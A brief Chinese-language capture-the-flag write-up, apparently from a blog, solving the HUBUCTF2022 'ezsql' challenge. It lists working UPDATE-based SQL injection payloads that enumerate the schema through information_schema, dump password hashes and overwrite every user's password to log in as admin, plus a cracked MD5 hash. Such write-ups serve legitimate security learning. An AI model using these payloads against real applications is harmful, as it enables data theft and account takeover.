HUBUCTF2022-ezsql-wp

题目描述：好想知道admin的密码呜呜呜~

UPDATE注入

注册登入发现可以更新个人信息其中age字段存在update注入，可通过描述字段查看所需信息

1. nickname=hhh&age=23, description=(select 1)%23	// 1
2. nickname=hhh&age=23, description=(select database())%23	// 查看数据库   demo2
3. nickname=hhh&age=23, description=(select group_concat(table_name) from information_schema.tables where table_schema=database())%23	//查看表 users
4. nickname=hhh&age=23, description=(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)%23    //查看列 id,username,password,nickname,age,description		（注意此处users会导致更新错误 替换为url编码）
5. nickname=hhh&age=23, description=(select group_concat(password) users)%23	// 0cc175b9c0f1b6a831c399e269772661 为md5格式

修改password

1	6. nickname=hhh&age=23, password=0x3230326362393632616335393037356239363462303731353264323334623730%23 // 0x32...30 == hex(md5('123'))

登录成功

username: admin password: 123

这里description是被覆盖过的，因为前面执行 [5] 的时候是对所有用户进行操作，使得description为password

可以看到description: 5a64edabc9358c603103053a3c600a88 爆破可得原始密码为 iamcool

需要重开环境直接 1.修改密码[6]再登录 2.iamcool登录

本博客采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.

Prev Home Next